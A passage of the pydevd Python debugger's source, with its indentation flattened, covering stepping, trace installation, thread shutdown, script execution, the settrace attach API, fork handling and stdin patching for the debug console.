info.pydev_step_stop = frame
info.pydev_smart_step_stop = None
self.set_trace_for_frame_and_parents(frame)
elif info.pydev_step_cmd == CMD_SMART_STEP_INTO:
info.pydev_step_stop = None
info.pydev_smart_step_stop = frame
self.set_trace_for_frame_and_parents(frame)
elif info.pydev_step_cmd == CMD_RUN_TO_LINE or info.pydev_step_cmd == CMD_SET_NEXT_STATEMENT:
info.pydev_step_stop = None
self.set_trace_for_frame_and_parents(frame)
stop = False
response_msg = ""
try:
stop, _old_line, response_msg = self.set_next_statement(frame, event, info.pydev_func_name, info.pydev_next_line)
except ValueError as e:
response_msg = "%s" % e
finally:
seq = info.pydev_message
cmd = self.cmd_factory.make_set_next_stmnt_status_message(seq, stop, response_msg)
self.writer.add_command(cmd)
info.pydev_message = ''
if stop:
# Uninstall the current frames tracker before running it.
frames_tracker.untrack_all()
cmd = self.cmd_factory.make_thread_run_message(get_current_thread_id(thread), info.pydev_step_cmd)
self.writer.add_command(cmd)
info.pydev_state = STATE_SUSPEND
thread.stop_reason = CMD_SET_NEXT_STATEMENT
keep_suspended = True
else:
# Set next did not work...
info.pydev_original_step_cmd = -1
info.pydev_step_cmd = -1
info.pydev_state = STATE_SUSPEND
thread.stop_reason = CMD_THREAD_SUSPEND
# return to the suspend state and wait for other command (without sending any
# additional notification to the client).
return self._do_wait_suspend(thread, frame, event, arg, suspend_type, from_this_thread, frames_tracker)
elif info.pydev_step_cmd in (CMD_STEP_RETURN, CMD_STEP_RETURN_MY_CODE):
back_frame = frame.f_back
force_check_project_scope = info.pydev_step_cmd == CMD_STEP_RETURN_MY_CODE
if force_check_project_scope or self.is_files_filter_enabled:
while back_frame is not None:
if self.apply_files_filter(back_frame, back_frame.f_code.co_filename, force_check_project_scope):
frame = back_frame
back_frame = back_frame.f_back
else:
break
if back_frame is not None:
# steps back to the same frame (in a return call it will stop in the 'back frame' for the user)
info.pydev_step_stop = frame
self.set_trace_for_frame_and_parents(frame)
else:
# No back frame?!? -- this happens in jython when we have some frame created from an awt event
# (the previous frame would be the awt event, but this isn't part of 'jython', only 'java')
# so, if we're doing a step return in this situation, it's the same as just making it run
info.pydev_step_stop = None
info.pydev_original_step_cmd = -1
info.pydev_step_cmd = -1
info.pydev_state = STATE_RUN
del frame
cmd = self.cmd_factory.make_thread_run_message(get_current_thread_id(thread), info.pydev_step_cmd)
self.writer.add_command(cmd)
with CustomFramesContainer.custom_frames_lock:
# The ones that remained on last_running must now be removed.
for frame_id in from_this_thread:
# print('Removing created frame: %s' % (frame_id,))
self.writer.add_command(self.cmd_factory.make_thread_killed_message(frame_id))
return keep_suspended
def do_stop_on_unhandled_exception(self, thread, frame, frames_byid, arg):
pydev_log.debug("We are stopping in unhandled exception.")
try:
add_exception_to_frame(frame, arg)
self.set_suspend(thread, CMD_ADD_EXCEPTION_BREAK)
self.do_wait_suspend(thread, frame, 'exception', arg, EXCEPTION_TYPE_UNHANDLED)
except:
pydev_log.exception("We've got an error while stopping in unhandled exception: %s.", arg[0])
finally:
remove_exception_from_frame(frame)
frame = None
def set_trace_for_frame_and_parents(self, frame, **kwargs):
disable = kwargs.pop('disable', False)
assert not kwargs
while frame is not None:
# Don't change the tracing on debugger-related files
file_type = self.get_file_type(frame)
if file_type is None:
if disable:
pydev_log.debug('Disable tracing of frame: %s - %s', frame.f_code.co_filename, frame.f_code.co_name)
if frame.f_trace is not None and frame.f_trace is not NO_FTRACE:
frame.f_trace = NO_FTRACE
elif frame.f_trace is not self.trace_dispatch:
pydev_log.debug('Set tracing of frame: %s - %s', frame.f_code.co_filename, frame.f_code.co_name)
frame.f_trace = self.trace_dispatch
else:
pydev_log.debug('SKIP set tracing of frame: %s - %s', frame.f_code.co_filename, frame.f_code.co_name)
frame = frame.f_back
del frame
def _create_pydb_command_thread(self):
curr_pydb_command_thread = self.py_db_command_thread
if curr_pydb_command_thread is not None:
curr_pydb_command_thread.do_kill_pydev_thread()
new_pydb_command_thread = self.py_db_command_thread = PyDBCommandThread(self)
new_pydb_command_thread.start()
def _create_check_output_thread(self):
curr_output_checker_thread = self.check_alive_thread
if curr_output_checker_thread is not None:
curr_output_checker_thread.do_kill_pydev_thread()
check_alive_thread = self.check_alive_thread = CheckAliveThread(self)
check_alive_thread.start()
def start_auxiliary_daemon_threads(self):
self._create_pydb_command_thread()
self._create_check_output_thread()
def __wait_for_threads_to_finish(self, timeout):
try:
with self._wait_for_threads_to_finish_called_lock:
wait_for_threads_to_finish_called = self._wait_for_threads_to_finish_called
self._wait_for_threads_to_finish_called = True
if wait_for_threads_to_finish_called:
# Make sure that we wait for the previous call to be finished.
self._wait_for_threads_to_finish_called_event.wait(timeout=timeout)
else:
try:
def get_pydb_daemon_threads_to_wait():
pydb_daemon_threads = set(dict_keys(self.created_pydb_daemon_threads))
pydb_daemon_threads.discard(self.check_alive_thread)
pydb_daemon_threads.discard(threading.current_thread())
return pydb_daemon_threads
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads waiting for pydb daemon threads to finish")
started_at = time.time()
# Note: we wait for all except the check_alive_thread (which is not really a daemon
# thread and it can call this method itself).
while time.time() < started_at + timeout:
if len(get_pydb_daemon_threads_to_wait()) == 0:
break
time.sleep(1 / 10.)
else:
thread_names = [t.getName() for t in get_pydb_daemon_threads_to_wait()]
if thread_names:
pydev_log.debug("The following pydb threads may not have finished correctly: %s",
', '.join(thread_names))
finally:
self._wait_for_threads_to_finish_called_event.set()
except:
pydev_log.exception()
def dispose_and_kill_all_pydevd_threads(self, wait=True, timeout=.5):
'''
When this method is called we finish the debug session, terminate threads
and if this was registered as the global instance, unregister it -- afterwards
it should be possible to create a new instance and set as global to start
a new debug session.
:param bool wait:
If True we'll wait for the threads to be actually finished before proceeding
(based on the available timeout).
Note that this must be thread-safe and if one thread is waiting the other thread should
also wait.
'''
try:
back_frame = sys._getframe().f_back
pydev_log.debug(
'PyDB.dispose_and_kill_all_pydevd_threads (called from: File "%s", line %s, in %s)',
back_frame.f_code.co_filename, back_frame.f_lineno, back_frame.f_code.co_name
)
back_frame = None
with self._disposed_lock:
disposed = self.pydb_disposed
self.pydb_disposed = True
if disposed:
if wait:
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads (already disposed - wait)")
self.__wait_for_threads_to_finish(timeout)
else:
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads (already disposed - no wait)")
return
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads (first call)")
# Wait until a time when there are no commands being processed to kill the threads.
started_at = time.time()
while time.time() < started_at + timeout:
with self._main_lock:
writer = self.writer
if writer is None or writer.empty():
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads no commands being processed.")
break
else:
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads timed out waiting for writer to be empty.")
pydb_daemon_threads = set(dict_keys(self.created_pydb_daemon_threads))
for t in pydb_daemon_threads:
if hasattr(t, 'do_kill_pydev_thread'):
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads killing thread: %s", t)
t.do_kill_pydev_thread()
if wait:
self.__wait_for_threads_to_finish(timeout)
else:
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads: no wait")
py_db = get_global_debugger()
if py_db is self:
set_global_debugger(None)
except:
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads: exception")
try:
if DebugInfoHolder.DEBUG_TRACE_LEVEL >= 3:
pydev_log.exception()
except:
pass
finally:
pydev_log.debug("PyDB.dispose_and_kill_all_pydevd_threads: finished")
def prepare_to_run(self):
''' Shared code to prepare debugging by installing traces and registering threads '''
self.patch_threads()
self.start_auxiliary_daemon_threads()
def patch_threads(self):
try:
# not available in jython!
threading.settrace(self.trace_dispatch) # for all future threads
except:
pass
from _pydev_bundle.pydev_monkey import patch_thread_modules
patch_thread_modules()
def run(self, file, globals=None, locals=None, is_module=False, set_trace=True):
module_name = None
entry_point_fn = ''
if is_module:
# When launching with `python -m <module>`, python automatically adds
# an empty path to the PYTHONPATH which resolves files in the current
# directory, so, depending how pydevd itself is launched, we may need
# to manually add such an entry to properly resolve modules in the
# current directory (see: https://github.com/Microsoft/ptvsd/issues/1010).
if '' not in sys.path:
sys.path.insert(0, '')
file, _, entry_point_fn = file.partition(':')
module_name = file
filename = get_fullname(file)
if filename is None:
mod_dir = get_package_dir(module_name)
if mod_dir is None:
sys.stderr.write("No module named %s\n" % file)
return
else:
filename = get_fullname("%s.__main__" % module_name)
if filename is None:
sys.stderr.write("No module named %s\n" % file)
return
else:
file = filename
else:
file = filename
mod_dir = os.path.dirname(filename)
main_py = os.path.join(mod_dir, '__main__.py')
main_pyc = os.path.join(mod_dir, '__main__.pyc')
if filename.endswith('__init__.pyc'):
if os.path.exists(main_pyc):
filename = main_pyc
elif os.path.exists(main_py):
filename = main_py
elif filename.endswith('__init__.py'):
if os.path.exists(main_pyc) and not os.path.exists(main_py):
filename = main_pyc
elif os.path.exists(main_py):
filename = main_py
sys.argv[0] = filename
if os.path.isdir(file):
new_target = os.path.join(file, '__main__.py')
if os.path.isfile(new_target):
file = new_target
m = None
if globals is None:
m = save_main_module(file, 'pydevd')
globals = m.__dict__
try:
globals['__builtins__'] = __builtins__
except NameError:
pass # Not there on Jython...
if locals is None:
locals = globals
# Predefined (writable) attributes: __name__ is the module's name;
# __doc__ is the module's documentation string, or None if unavailable;
# __file__ is the pathname of the file from which the module was loaded,
# if it was loaded from a file. The __file__ attribute is not present for
# C modules that are statically linked into the interpreter; for extension modules
# loaded dynamically from a shared library, it is the pathname of the shared library file.
# I think this is an ugly hack, but it works (seems to) for the bug that says that sys.path should be the same in
# debug and run.
if sys.path[0] != '' and m is not None and m.__file__.startswith(sys.path[0]):
# print >> sys.stderr, 'Deleting: ', sys.path[0]
del sys.path[0]
if not is_module:
# now, the local directory has to be added to the pythonpath
# sys.path.insert(0, os.getcwd())
# Changed: it's not the local directory, but the directory of the file launched
# The file being run must be in the pythonpath (even if it was not before)
sys.path.insert(0, os.path.split(os_path_abspath(file))[0])
if set_trace:
self.wait_for_ready_to_run()
# call prepare_to_run when we already have all information about breakpoints
self.prepare_to_run()
t = threadingCurrentThread()
thread_id = get_current_thread_id(t)
if self.thread_analyser is not None:
wrap_threads()
self.thread_analyser.set_start_time(cur_time())
send_concurrency_message("threading_event", 0, t.getName(), thread_id, "thread", "start", file, 1, None, parent=thread_id)
if self.asyncio_analyser is not None:
# we don't have main thread in asyncio graph, so we should add a fake event
send_concurrency_message("asyncio_event", 0, "Task", "Task", "thread", "stop", file, 1, frame=None, parent=None)
try:
if INTERACTIVE_MODE_AVAILABLE:
self.init_matplotlib_support()
except:
sys.stderr.write("Matplotlib support in debugger failed\n")
pydev_log.exception()
if hasattr(sys, 'exc_clear'):
# we should clean exception information in Python 2, before user's code execution
sys.exc_clear()
# Notify that the main thread is created.
self.notify_thread_created(thread_id, t)
# Note: important: set the tracing right before calling _exec.
if set_trace:
self.enable_tracing()
return self._exec(is_module, entry_point_fn, module_name, file, globals, locals)
def _exec(self, is_module, entry_point_fn, module_name, file, globals, locals):
'''
This function should have frames tracked by unhandled exceptions (the `_exec` name is important).
'''
if not is_module:
pydev_imports.execfile(file, globals, locals) # execute the script
else:
# treat ':' as a separator between module and entry point function
# if there is no entry point we run the same as with the -m switch. Otherwise we perform
# an import and execute the entry point
if entry_point_fn:
mod = __import__(module_name, level=0, fromlist=[entry_point_fn], globals=globals, locals=locals)
func = getattr(mod, entry_point_fn)
func()
else:
# Run with the -m switch
import runpy
if hasattr(runpy, '_run_module_as_main'):
# Newer versions of Python actually use this when the -m switch is used.
if sys.version_info[:2] <= (2, 6):
runpy._run_module_as_main(module_name, set_argv0=False)
else:
runpy._run_module_as_main(module_name, alter_argv=False)
else:
runpy.run_module(module_name)
return globals
def wait_for_commands(self, globals):
self._activate_mpl_if_needed()
thread = threading.currentThread()
from _pydevd_bundle import pydevd_frame_utils
frame = pydevd_frame_utils.Frame(None, -1, pydevd_frame_utils.FCode("Console",
os.path.abspath(os.path.dirname(__file__))), globals, globals)
thread_id = get_current_thread_id(thread)
self.add_fake_frame(thread_id, id(frame), frame)
cmd = self.cmd_factory.make_show_console_message(self, thread_id, frame)
if self.writer is not None:
self.writer.add_command(cmd)
while True:
if self.mpl_in_use:
# call input hooks if only matplotlib is in use
self._call_mpl_hook()
self.process_internal_commands()
time.sleep(0.01)
class IDAPMessagesListener(object):
def before_send(self, message_as_dict):
'''
Called just before a message is sent to the IDE.
:type message_as_dict: dict
'''
def after_receive(self, message_as_dict):
'''
Called just after a message is received from the IDE.
:type message_as_dict: dict
'''
def add_dap_messages_listener(dap_messages_listener):
'''
Adds a listener for the DAP (debug adapter protocol) messages.
:type dap_messages_listener: IDAPMessagesListener
:note: messages from the xml backend are not notified through this API.
:note: the notifications are sent from threads and they are not synchronized (so,
it's possible that a message is sent and received from different threads at the same time).
'''
py_db = get_global_debugger()
if py_db is None:
raise AssertionError('PyDB is still not setup.')
py_db.add_dap_messages_listener(dap_messages_listener)
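# Illustrative sketch (not part of the original module): a minimal listener that just
# logs DAP traffic. The class name is an assumption for demonstration; any object
# exposing these two methods works.
#
#     class MyDAPMessagesListener(IDAPMessagesListener):
#
#         def before_send(self, message_as_dict):
#             pydev_log.debug('DAP out: %s', message_as_dict)
#
#         def after_receive(self, message_as_dict):
#             pydev_log.debug('DAP in: %s', message_as_dict)
#
#     add_dap_messages_listener(MyDAPMessagesListener())  # requires an initialized PyDB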
def send_json_message(msg):
'''
API to send some custom json message.
:param dict|pydevd_schema.BaseSchema msg:
The custom message to be sent.
:return bool:
True if the message was added to the queue to be sent and False otherwise.
'''
py_db = get_global_debugger()
if py_db is None:
return False
writer = py_db.writer
if writer is None:
return False
cmd = NetCommand(-1, 0, msg, is_json=True)
writer.add_command(cmd)
return True
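# Illustrative usage sketch (hypothetical payload; requires an already connected
# debugger, otherwise the function simply returns False):
#
#     sent = send_json_message({'type': 'event', 'event': 'myCustomEvent',
#                               'body': {'info': 'value'}})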
def set_debug(setup):
setup['DEBUG_RECORD_SOCKET_READS'] = True
setup['DEBUG_TRACE_BREAKPOINTS'] = 1
setup['DEBUG_TRACE_LEVEL'] = 3
def enable_qt_support(qt_support_mode):
from _pydev_bundle import pydev_monkey_qt
pydev_monkey_qt.patch_qt(qt_support_mode)
def start_dump_threads_thread(filename_template, timeout, recurrent):
'''
Helper to dump threads after a timeout.
:param filename_template:
A template filename, such as 'c:/temp/thread_dump_%s.txt', where the %s will
be replaced by the time for the dump.
:param timeout:
The timeout (in seconds) for the dump.
:param recurrent:
If True we'll keep on doing thread dumps.
'''
assert filename_template.count('%s') == 1, \
'Expected one %%s to appear in: %s' % (filename_template,)
def _threads_on_timeout():
try:
while True:
time.sleep(timeout)
filename = filename_template % (time.time(),)
try:
os.makedirs(os.path.dirname(filename))
except Exception:
pass
with open(filename, 'w') as stream:
dump_threads(stream)
if not recurrent:
return
except Exception:
pydev_log.exception()
t = threading.Thread(target=_threads_on_timeout)
mark_as_pydevd_daemon_thread(t)
t.start()
def dump_threads(stream=None):
'''
Helper to dump thread info (default is printing to stderr).
'''
pydevd_utils.dump_threads(stream)
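# Illustrative usage sketch (the output path is an assumption for demonstration):
#
#     # dump all thread stacks to a timestamped file every 30 seconds
#     start_dump_threads_thread('/tmp/thread_dump_%s.txt', timeout=30, recurrent=True)
#
#     # or write a single dump to stderr right away
#     dump_threads()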
def usage(doExit=0):
sys.stdout.write('Usage:\n')
sys.stdout.write('pydevd.py --port N [(--client hostname) | --server] --file executable [file_options]\n')
if doExit:
sys.exit(0)
def _init_stdout_redirect():
pydevd_io.redirect_stream_to_pydb_io_messages(std='stdout')
def _init_stderr_redirect():
pydevd_io.redirect_stream_to_pydb_io_messages(std='stderr')
def _enable_attach(
address,
dont_trace_start_patterns=(),
dont_trace_end_patterns=(),
patch_multiprocessing=False,
access_token=None,
client_access_token=None,
):
'''
Starts accepting connections at the given host/port. The debugger will not be initialized nor
configured, it'll only start accepting connections (and will have the tracing setup in this
thread).
Meant to be used with the DAP (Debug Adapter Protocol) with _wait_for_attach().
:param address: (host, port)
:type address: tuple(str, int)
'''
host = address[0]
port = int(address[1])
if SetupHolder.setup is not None:
if port != SetupHolder.setup['port']:
raise AssertionError('Unable to listen in port: %s (already listening in port: %s)' % (port, SetupHolder.setup['port']))
settrace(
host=host,
port=port,
suspend=False,
wait_for_ready_to_run=False,
block_until_connected=False,
dont_trace_start_patterns=dont_trace_start_patterns,
dont_trace_end_patterns=dont_trace_end_patterns,
patch_multiprocessing=patch_multiprocessing,
access_token=access_token,
client_access_token=client_access_token,
)
py_db = get_global_debugger()
py_db.wait_for_server_socket_ready()
return py_db._server_socket_name
def _wait_for_attach(cancel=None):
'''
Meant to be called after _enable_attach() -- the current thread will only unblock after a
connection is in place and the DAP (Debug Adapter Protocol) sends the ConfigurationDone
request.
'''
py_db = get_global_debugger()
if py_db is None:
raise AssertionError('Debugger still not created. Please use _enable_attach() before using _wait_for_attach().')
py_db.block_until_configuration_done(cancel=cancel)
def _is_attached():
'''
Can be called any time to check if the connection was established and the DAP (Debug Adapter Protocol) has sent
the ConfigurationDone request.
'''
py_db = get_global_debugger()
return (py_db is not None) and py_db.is_attached()
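# Illustrative attach-flow sketch (host/port are assumptions): a process that wants
# to wait for a DAP client before continuing would typically do something like:
#
#     _enable_attach(('127.0.0.1', 5678))
#     _wait_for_attach()   # blocks until the ConfigurationDone request arrives
#     assert _is_attached()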
#=======================================================================================================================
# settrace
#=======================================================================================================================
def settrace(
host=None,
stdout_to_server=False,
stderr_to_server=False,
port=5678,
suspend=True,
trace_only_current_thread=False,
overwrite_prev_trace=False,
patch_multiprocessing=False,
stop_at_frame=None,
block_until_connected=True,
wait_for_ready_to_run=True,
dont_trace_start_patterns=(),
dont_trace_end_patterns=(),
access_token=None,
client_access_token=None,
notify_stdin=True,
**kwargs
):
'''Sets the tracing function with the pydev debug function and initializes needed facilities.
:param host: the user may specify another host, if the debug server is not on the same machine (default is the local
host)
:param stdout_to_server: when this is true, the stdout is passed to the debug server
:param stderr_to_server: when this is true, the stderr is passed to the debug server
so that they are printed in its console and not in this process console.
:param port: specifies which port to use for communicating with the server (note that the server must be started
on the same port). @note: currently it's hard-coded at 5678 in the client
:param suspend: whether a breakpoint should be emulated as soon as this function is called.
:param trace_only_current_thread: determines if only the current thread will be traced or all current and future
threads will also have the tracing enabled.
:param overwrite_prev_trace: deprecated
:param patch_multiprocessing: if True we'll patch the functions which create new processes so that launched
processes are debugged.
:param stop_at_frame: if passed it'll stop at the given frame, otherwise it'll stop in the function which
called this method.
:param wait_for_ready_to_run: if True settrace will block until the ready_to_run flag is set to True,
otherwise, it'll set ready_to_run to True and this function won't block.
Note that if wait_for_ready_to_run == False, there are no guarantees that the debugger is synchronized
with what's configured in the client (IDE), the only guarantee is that when leaving this function
the debugger will be already connected.
:param dont_trace_start_patterns: if set, then any path that starts with one of the patterns in the collection
will not be traced
:param dont_trace_end_patterns: if set, then any path that ends with one of the patterns in the collection
will not be traced
:param access_token: token to be sent from the client (i.e.: IDE) to the debugger when a connection
is established (verified by the debugger).
:param client_access_token: token to be sent from the debugger to the client (i.e.: IDE) when
a connection is established (verified by the client).
:param notify_stdin:
If True sys.stdin will be patched to notify the client when input is requested
from it (i.e., the client is notified whenever stdin is read).
Clients may need this to know when something that is being written should be interpreted
as an input to the process or as a command to be evaluated.
Note that parallel-python has issues with this (because it tries to assert that sys.stdin
is of a given type instead of just checking that it has what it needs).
'''
stdout_to_server = stdout_to_server or kwargs.get('stdoutToServer', False) # Backward compatibility
stderr_to_server = stderr_to_server or kwargs.get('stderrToServer', False) # Backward compatibility
# Internal use (may be used to set the setup info directly for subprocesses).
__setup_holder__ = kwargs.get('__setup_holder__')
with _set_trace_lock:
_locked_settrace(
host,
stdout_to_server,
stderr_to_server,
port,
suspend,
trace_only_current_thread,
patch_multiprocessing,
stop_at_frame,
block_until_connected,
wait_for_ready_to_run,
dont_trace_start_patterns,
dont_trace_end_patterns,
access_token,
client_access_token,
__setup_holder__=__setup_holder__,
notify_stdin=notify_stdin,
)
_set_trace_lock = ForkSafeLock()
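# Illustrative usage sketch (host/port are assumptions; the IDE-side debug server
# must already be listening on that port):
#
#     import pydevd
#     pydevd.settrace('localhost', port=5678, suspend=True,
#                     stdout_to_server=True, stderr_to_server=True)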
def _locked_settrace(
host,
stdout_to_server,
stderr_to_server,
port,
suspend,
trace_only_current_thread,
patch_multiprocessing,
stop_at_frame,
block_until_connected,
wait_for_ready_to_run,
dont_trace_start_patterns,
dont_trace_end_patterns,
access_token,
client_access_token,
__setup_holder__,
notify_stdin,
):
if patch_multiprocessing:
try:
from _pydev_bundle import pydev_monkey
except:
pass
else:
pydev_monkey.patch_new_process_functions()
if host is None:
from _pydev_bundle import pydev_localhost
host = pydev_localhost.get_localhost()
global _global_redirect_stdout_to_server
global _global_redirect_stderr_to_server
py_db = get_global_debugger()
if __setup_holder__:
SetupHolder.setup = __setup_holder__
if py_db is None:
py_db = PyDB()
pydevd_vm_type.setup_type()
if SetupHolder.setup is None:
setup = {
'client': host, # dispatch expects client to be set to the host address when server is False
'server': False,
'port': int(port),
'multiprocess': patch_multiprocessing,
'skip-notify-stdin': not notify_stdin,
}
SetupHolder.setup = setup
if access_token is not None:
py_db.authentication.access_token = access_token
SetupHolder.setup['access-token'] = access_token
if client_access_token is not None:
py_db.authentication.client_access_token = client_access_token
SetupHolder.setup['client-access-token'] = client_access_token
if block_until_connected:
py_db.connect(host, port) # Note: connect can raise error.
else:
# Create a dummy writer and wait for the real connection.
py_db.writer = WriterThread(NULL, py_db, terminate_on_socket_close=False)
py_db.create_wait_for_connection_thread()
if dont_trace_start_patterns or dont_trace_end_patterns:
PyDevdAPI().set_dont_trace_start_end_patterns(py_db, dont_trace_start_patterns, dont_trace_end_patterns)
_global_redirect_stdout_to_server = stdout_to_server
_global_redirect_stderr_to_server = stderr_to_server
if _global_redirect_stdout_to_server:
_init_stdout_redirect()
if _global_redirect_stderr_to_server:
_init_stderr_redirect()
if notify_stdin:
patch_stdin()
t = threadingCurrentThread()
additional_info = set_additional_thread_info(t)
if not wait_for_ready_to_run:
py_db.ready_to_run = True
py_db.wait_for_ready_to_run()
py_db.start_auxiliary_daemon_threads()
if trace_only_current_thread:
py_db.enable_tracing()
else:
# Trace future threads.
py_db.patch_threads()
py_db.enable_tracing(py_db.trace_dispatch, apply_to_all_threads=True)
# As this is the first connection, also set tracing for any untraced threads
py_db.set_tracing_for_untraced_contexts()
py_db.set_trace_for_frame_and_parents(get_frame().f_back)
with CustomFramesContainer.custom_frames_lock: # @UndefinedVariable
for _frameId, custom_frame in dict_iter_items(CustomFramesContainer.custom_frames):
py_db.set_trace_for_frame_and_parents(custom_frame.frame)
else:
# ok, we're already in debug mode, with all set, so, let's just set the break
if access_token is not None:
py_db.authentication.access_token = access_token
if client_access_token is not None:
py_db.authentication.client_access_token = client_access_token
py_db.set_trace_for_frame_and_parents(get_frame().f_back)
t = threadingCurrentThread()
additional_info = set_additional_thread_info(t)
if trace_only_current_thread:
py_db.enable_tracing()
else:
# Trace future threads.
py_db.patch_threads()
py_db.enable_tracing(py_db.trace_dispatch, apply_to_all_threads=True)
# Suspend as the last thing after all tracing is in place.
if suspend:
if stop_at_frame is not None:
# If the step was set we have to go to run state and
# set the proper frame for it to stop.
additional_info.pydev_state = STATE_RUN
additional_info.pydev_original_step_cmd = CMD_STEP_OVER
additional_info.pydev_step_cmd = CMD_STEP_OVER
additional_info.pydev_step_stop = stop_at_frame
additional_info.suspend_type = PYTHON_SUSPEND
else:
# Ask to break as soon as possible.
py_db.set_suspend(t, CMD_SET_BREAK)
def stoptrace():
pydev_log.debug("pydevd.stoptrace()")
pydevd_tracing.restore_sys_set_trace_func()
sys.settrace(None)
try:
# not available in jython!
threading.settrace(None) # for all future threads
except:
pass
from _pydev_bundle.pydev_monkey import undo_patch_thread_modules
undo_patch_thread_modules()
# Either or both standard streams can be closed at this point,
# in which case flush() will fail.
try:
sys.stdout.flush()
except:
pass
try:
sys.stderr.flush()
except:
pass
py_db = get_global_debugger()
if py_db is not None:
py_db.dispose_and_kill_all_pydevd_threads()
class Dispatcher(object):
def __init__(self):
self.port = None
def connect(self, host, port):
self.host = host
self.port = port
self.client = start_client(self.host, self.port)
self.reader = DispatchReader(self)
self.reader.pydev_do_not_trace = False # we run the reader in the same thread so we don't want to lose tracing
self.reader.run()
def close(self):
try:
self.reader.do_kill_pydev_thread()
except:
pass
class DispatchReader(ReaderThread):
def __init__(self, dispatcher):
self.dispatcher = dispatcher
ReaderThread.__init__(
self,
get_global_debugger(),
self.dispatcher.client,
PyDevJsonCommandProcessor=PyDevJsonCommandProcessor,
process_net_command=process_net_command,
)
@overrides(ReaderThread._on_run)
def _on_run(self):
dummy_thread = threading.currentThread()
dummy_thread.is_pydev_daemon_thread = False
return ReaderThread._on_run(self)
@overrides(PyDBDaemonThread.do_kill_pydev_thread)
def do_kill_pydev_thread(self):
if not self._kill_received:
ReaderThread.do_kill_pydev_thread(self)
try:
self.sock.shutdown(SHUT_RDWR)
except:
pass
try:
self.sock.close()
except:
pass
def process_command(self, cmd_id, seq, text):
if cmd_id == 99:
self.dispatcher.port = int(text)
self._kill_received = True
DISPATCH_APPROACH_NEW_CONNECTION = 1 # Used by PyDev
DISPATCH_APPROACH_EXISTING_CONNECTION = 2 # Used by PyCharm
DISPATCH_APPROACH = DISPATCH_APPROACH_NEW_CONNECTION
def dispatch():
setup = SetupHolder.setup
host = setup['client']
port = setup['port']
if DISPATCH_APPROACH == DISPATCH_APPROACH_EXISTING_CONNECTION:
dispatcher = Dispatcher()
try:
dispatcher.connect(host, port)
port = dispatcher.port
finally:
dispatcher.close()
return host, port
def settrace_forked(setup_tracing=True):
'''
When creating a fork from a process in the debugger, we need to reset the whole debugger environment!
'''
from _pydevd_bundle.pydevd_constants import GlobalDebuggerHolder
py_db = GlobalDebuggerHolder.global_dbg
if py_db is not None:
py_db.created_pydb_daemon_threads = {} # Just making sure we won't touch those (paused) threads.
py_db = None
GlobalDebuggerHolder.global_dbg = None
threading.current_thread().additional_info = None
# Make sure that we keep the same access tokens for subprocesses started through fork.
setup = SetupHolder.setup
if setup is None:
setup = {}
else:
# i.e.: Get the ppid at this point as it just changed.
# If we later do an exec() it should remain the same ppid.
setup[pydevd_constants.ARGUMENT_PPID] = PyDevdAPI().get_ppid()
access_token = setup.get('access-token')
client_access_token = setup.get('client-access-token')
if setup_tracing:
from _pydevd_frame_eval.pydevd_frame_eval_main import clear_thread_local_info
host, port = dispatch()
import pydevd_tracing
pydevd_tracing.restore_sys_set_trace_func()
if setup_tracing:
if port is not None:
custom_frames_container_init()
if clear_thread_local_info is not None:
clear_thread_local_info()
settrace(
host,
port=port,
suspend=False,
trace_only_current_thread=False,
overwrite_prev_trace=True,
patch_multiprocessing=True,
access_token=access_token,
client_access_token=client_access_token,
)
@contextmanager
def skip_subprocess_arg_patch():
'''
May be used to skip, for calls made inside this block, the monkey-patching that pydevd
does to change subprocess arguments so that the debugger is embedded into child processes.
i.e.:
with pydevd.skip_subprocess_arg_patch():
subprocess.call(...)
'''
from _pydev_bundle import pydev_monkey
with pydev_monkey.skip_subprocess_arg_patch():
yield
def add_dont_terminate_child_pid(pid):
'''
May be used to ask pydevd to skip the termination of some process
when it's asked to terminate (debug adapter protocol only).
:param int pid:
The pid to be ignored.
i.e.:
process = subprocess.Popen(...)
pydevd.add_dont_terminate_child_pid(process.pid)
'''
py_db = get_global_debugger()
if py_db is not None:
py_db.dont_terminate_child_pids.add(pid)
class SetupHolder:
setup = None
def apply_debugger_options(setup_options):
"""
:type setup_options: dict[str, bool]
"""
default_options = {'save-signatures': False, 'qt-support': ''}
default_options.update(setup_options)
setup_options = default_options
debugger = get_global_debugger()
if setup_options['save-signatures']:
if pydevd_vm_type.get_vm_type() == pydevd_vm_type.PydevdVmType.JYTHON:
sys.stderr.write("Collecting run-time type information is not supported for Jython\n")
else:
# Only import it if we're going to use it!
from _pydevd_bundle.pydevd_signature import SignatureFactory
debugger.signature_factory = SignatureFactory()
if setup_options['qt-support']:
enable_qt_support(setup_options['qt-support'])
@call_only_once
def patch_stdin():
_internal_patch_stdin(None, sys, getpass_mod)
def _internal_patch_stdin(py_db=None, sys=None, getpass_mod=None):
'''
Note: don't use this function directly, use `patch_stdin()` instead.
(this function is only meant to be used in test-cases to avoid patching the actual globals).
'''
# Patch stdin so that we notify when readline() is called.
original_sys_stdin = sys.stdin
debug_console_stdin = DebugConsoleStdIn(py_db, original_sys_stdin)
sys.stdin = debug_console_stdin
_original_getpass = getpass_mod.getpass
@functools.wraps(_original_getpass)
def getpass(*args, **kwargs):
with DebugConsoleStdIn.notify_input_requested(debug_console_stdin):
try:
curr_stdin = sys.stdin
if curr_stdin is debug_console_stdin:
sys.stdin = original_sys_stdin
return _original_getpass(*args, **kwargs)
finally:
sys.stdin = curr_stdin
getpass_mod.getpass = getpass
# Dispatch on_debugger_modules_loaded here, after all primary py_db modules are loaded
for handler in pydevd_extension_utils.extensions_of_type(DebuggerEventHandler):
handler.on_debugger_modules_loaded(debugger_version=__version__)
#=======================================================================================================================
# main
#=======================================================================================================================
def main():
# parse the command line. --file is our last argument that is required
pydev_log.debug("Initial arguments: %s", (sys.argv,))
pydev_log.debug("Current pid: %s", os.getpid())
try:
from _pydevd_bundle.pydevd_command_line_handling import process_command_line
setup = process_command_line(sys.argv)
SetupHolder.setup = setup
except ValueError:
pydev_log.exception()
usage(1)
if setup['print-in-debugger-startup']:
try:
pid = ' (pid: %s)' % os.getpid()
except:
pid = ''
sys.stderr.write("pydev debugger: starting%s\n" % pid)
